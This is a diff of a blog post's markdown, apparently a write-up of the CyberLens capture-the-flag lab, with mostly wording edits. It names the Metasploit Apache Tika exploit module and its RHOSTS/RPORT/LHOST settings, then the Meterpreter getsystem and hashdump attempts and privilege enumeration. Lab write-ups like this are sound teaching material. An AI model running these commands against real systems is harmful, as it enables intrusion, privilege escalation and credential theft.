mrashco/mrash.co/content/post/2024/cyberlens.md

 It's `exploit/windows/http/apache_tika_jp2_jscript` or type `use 0` when it's the first search item.

 Set the following options with `set $option $value`:
-- RHOSTS = $MACHINE_IP
+- `set RHOSTS $MACHINE_IP`
-- RPORT = 61777
+- `set RPORT 61777`
-- LHOST = $YOUR_IP
+- `set LHOST $YOUR_IP`

-For example, `set LHOST 10.10.10.10` and then use `run` or `go` when you're ready.
+And then use `run` or `go` when you're ready.

-The user flag hint "Sometimes exploits take a few tries before they are successful ;)" comes in here.
+The user flag hint **Sometimes exploits take a few tries before they are successful ;)** comes in here.

 You may need to try this once or twice to get it working.
-Just check your exploit options are correct.
+Double check your options are correct.

-But when the exploit works and a session is created, you'll be greeted with:
+When the exploit works and a sessions created, you'll see:

 ![Metasploit Tika Exploit Session](https://i.imgur.com/fybpy7B.png)

 We're in.

-Now what?
-Well first, who are we?
+So who are we?

-With a quick `whoami` we're the user `cyberlens`.
-Cool.
+A quick `whoami` and we're user `cyberlens`.

-Then since we're in Meterpreter, there's extra luxuries to try, like:
+Since we're in Meterpreter, there are extra luxuries, like:
 - `sysinfo` for some system background.
 - `getsystem` for a quick priv esc attempt... no luck there.
 - `hashdump` for a sneaky SAM database dump... again, no luck.

-Worth a quick try.
+Worth a try.

 Otherwise, let's look around.
 Do what the kids call 'manual enumeration'.

-We can also drop a normal shell on the system using `shell` and then enter PowerShell with `powershell`.
+We can drop a shell on the system using `shell` and then enter PowerShell with `powershell`.

 ![Meterpreter Shell To PowerShell](https://i.imgur.com/vGEq0YN.png)

-Here we can try some to see maybe some info about what we can do:
+Let's see some info about what we can do:
 - `whoami /priv`
 - `whoami /all`